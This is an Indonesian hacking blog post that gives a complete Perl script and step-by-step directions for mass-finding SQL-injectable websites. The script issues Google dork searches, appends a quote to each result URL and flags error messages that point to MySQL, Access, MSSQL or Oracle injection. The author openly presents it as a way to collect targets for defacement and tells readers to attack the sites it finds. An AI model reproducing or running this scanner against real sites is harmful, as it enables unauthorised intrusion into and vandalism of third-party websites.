SQL Google Search Tool

4 Januari 2010 at 10:16 (oprek)

SQL – Google Search??
Tools ini gunanya buat nyari web2 yg bs kita suntik. Stelah sy liat skripnya, ada 4 vulnerable yg diuber2 ma tools ini, MySQL Injection, MS Access Injection, MSSQL Injection, & Oracle Injection. Lumayan buat tambah2 koleksi deface…
1.Donlod dolo active perl-nya [buat yg pake WINDOW$], klo yg pake linux, lgsg cabod ke terminal aj… ActivePerl-nya cari ndiri yak…Banyak di google..

2.Install…

3.Copas skrip dibwh
#!/usr/bin/perl
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Request;
my $sis=”$^O”;if ($sis eq ‘MSWin32′) { system(“cls”); } else { system(“clear”); }
print “+++++++++++++++++++++++++++++++\n”;
print “+ SQL – Google Search +\n”;
print “+ CWH Underground +\n”;
print “+++++++++++++++++++++++++++++++\n\n”;
print “Insert Dork:”;
chomp( my $dork = <STDIN> );
print “Total Query Pages (10 Links/Pages) :”;
chomp( my $page = <STDIN> );
print “\n[+] Result:\n\n”;
for($start = 0;$start != $page*10;$start += 10)
{
$t = “http://www.google.com/search?hl=en&q=”.$dork.”&btnG=Search&start=”.$start;
$ua = LWP::UserAgent->new(agent => ‘Mozilla 5.2′);
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($t);
if ($response->is_success)
{
$c = $response->content;
@stuff = split(/<a href=/,$c);
foreach $line(@stuff)
{
if($line =~/(.*)/ig)
{
$out = $1;
$out =~ s/\”//g;
$out =~s/$/\’/;
$ua = LWP::UserAgent->new(agent => ‘Mozilla 5.2′);
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($out);
$error = $response->content();
if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)
{print “$out => Could be Vulnerable in MySQL Injection!!\n”;}
elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
{print “$out => Could be Vulnerable in MS Access Injection!!\n”;}
elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
{print “$out => Could be Vulnerable in MSSQL Injection!!\n”;}
elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
{print “$out => Could be Vulnerable in Oracle Injection!!\n”;}
}
}
}
}

4.Save dgn ekstensi ‘.pl’, misal SQL.pl

5.Buka CMD-nya, masok ke direktori file tsb, jalanin dgn perintah SQL.pl

6.Masokin dork, misal, inurl:index.php?id=

7.Isi jumlah halaman yg kalian minta, enter…Tinggal tunggu hasil dari tools tsb…

8.Klo dah kluar target2nya…HAJAR mpe MAMPOS!!!!

Hasil dari tools diatas sangat bergantung ma DORK yg kita pilih…. Makanya gunakan kreativitas kalian buat utak-atik dork-nya…
Jgn Manja!!! Searching google ato kluyuran ke forum2 hacking buat nyari DORK….

Searching pke nih tools, eksekusi-nya pake schemafuzz… manteb bner!!! hakwkwkwkwkwkwkw…..Asal kalian dah lancar maen manual-nya, nggak ada salahnya make tools2 buat dipes….Jgn cuman bisa pke tools, tp disuruh manual, hasilnya TELOR!!!!

Okeh, sgini dolo materinya…Gut Lak!!!

-L4zyB0i@everywhere

1 Komentar

  1. -LeaK- berkata,

    17 Januari 2010 pada 10:16

    bro, ada ym ga?
    ane mo ikutan blajar bareng.

    aku lokasi d jogja jg
    gejayan

    Balas

Tinggalkan Balasan

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Ubah )

Twitter picture

You are commenting using your Twitter account. Log Out / Ubah )

Facebook photo

You are commenting using your Facebook account. Log Out / Ubah )

Batal

Connecting to %s

Ikuti

Get every new post delivered to your Inbox.